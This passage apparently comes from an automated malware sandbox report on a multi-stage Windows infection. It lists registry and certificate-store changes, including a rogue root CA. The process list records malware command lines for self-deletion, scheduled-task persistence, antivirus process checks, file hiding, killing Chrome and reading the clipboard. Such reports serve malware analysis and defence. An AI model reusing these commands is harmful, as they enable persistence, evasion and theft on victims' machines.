| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{453a990c-0000-0000-0000-d01200000000} | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936320200006024b221ea3a6910a2dc08002b30309d1d030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket | C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936320200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" | C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe
"C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe"
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
C:\Users\Admin\1000004002\7ec52fcc46.exe
"C:\Users\Admin\1000004002\7ec52fcc46.exe"
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3716 -ip 3716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 304
C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe"
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3548 -ip 3548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 320
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
"C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe" /F
C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe
"C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Users\Admin\Pictures\4TS3Fy6BMMUZF4kDjwSDYcZ6.exe
"C:\Users\Admin\Pictures\4TS3Fy6BMMUZF4kDjwSDYcZ6.exe" /s
C:\Users\Admin\Pictures\a7YGq3H0uFjl3y1aChNJg5jL.exe
"C:\Users\Admin\Pictures\a7YGq3H0uFjl3y1aChNJg5jL.exe"
C:\Users\Admin\Pictures\wg2sDWUI4FJX9WOCZzfaJ2SE.exe
"C:\Users\Admin\Pictures\wg2sDWUI4FJX9WOCZzfaJ2SE.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Albany Albany.cmd & Albany.cmd & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe
"C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Users\Admin\Pictures\hn3O0pnsWX4honw7kWK1yFIQ.exe
"C:\Users\Admin\Pictures\hn3O0pnsWX4honw7kWK1yFIQ.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\cmd.exe
cmd /c md 400508
C:\Windows\SysWOW64\findstr.exe
findstr /V "architectureeditionshowardhabits" Sterling
C:\Users\Admin\AppData\Local\Temp\7zS6C80.tmp\Install.exe
.\Install.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Environment + Company + Graduated + Vary 400508\y
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif
400508\Cruz.pif 400508\y
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe
"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"
C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe
.\Install.exe /yrVdidRYRgn "385118" /S
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
